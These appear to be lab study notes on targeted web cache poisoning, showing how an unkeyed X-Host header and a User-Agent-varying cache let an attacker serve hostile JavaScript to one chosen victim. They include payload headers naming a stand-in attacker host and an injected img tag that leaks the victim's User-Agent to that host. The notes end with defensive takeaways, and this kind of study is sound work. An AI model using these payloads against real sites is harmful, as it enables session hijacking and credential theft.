Note(Datetime, Name) : 2025-04-26 Targeted web cache poisoning using an unknown header

Metodelogy

  1. Investigate the system to retrieve a list of features
  2. Discribe the feature and explain how it works
  3. List possible vulnerabilities and group by feature
  4. Proof of concept for possible vulnerabilities
  5. What is the impact of the vulnerabilities after the proof of concept ?

==========================================================================================================

feature:

  1. GET '/' -> cache hit and indicated User-Agent is cache key due to they use Vary Header
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: User-Agent
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=30
Age: 0
X-Cache: miss
Connection: close
Content-Length: 5881

steps taken:

  1. payload -> noting happend 
    X-Forwarded-Host: evil.com
X-Forwarded-Scheme: http
  2. payload -> change js url to ///file.js
    X-Host: <attackerserver>

vulnerabilities :

  1. web cahce poisoning ->using X-Host:

Proof of concept:

find victim

  1. access /post?postId= -> in the comment section, some input fields support HTML
  2. inject the following to capture the victim's User-Agent : 
    <img src="https://<attackerserver>/foo" />

send to the target

  1. send payload to the specific target user -> ensure the web is cacheable 
    X-Host: <attackerserver>
User-Agent: <victim user agent got by log access in attackerserver>
  2. wait for the script https:///file.js was execute by the victim

impact

  • The attacker can poison the cache for a specific User-Agent, delivering malicious Javascritp to the target user
  • Leads to session hijacking, credential theift, or browser exploitation depending on the payload
  • Cache poisoning affect multiple users if a shared or common User-Agent is targeted
  • Exploit server-side trust in HTTP header X-Host without proper validation or santiaton

takeaways

  • Avoid trusting unvalidaed HTTP header such as X-Host
  • Do not reflect header values into responses without proper encoding
  • Ensure that responses vary appropriate when header affect content
  • Use a strict caching stragy , or disable caching for dynamic pages if unsure
  • Regularly audit and monitor logs for unusual patterns and unknown domains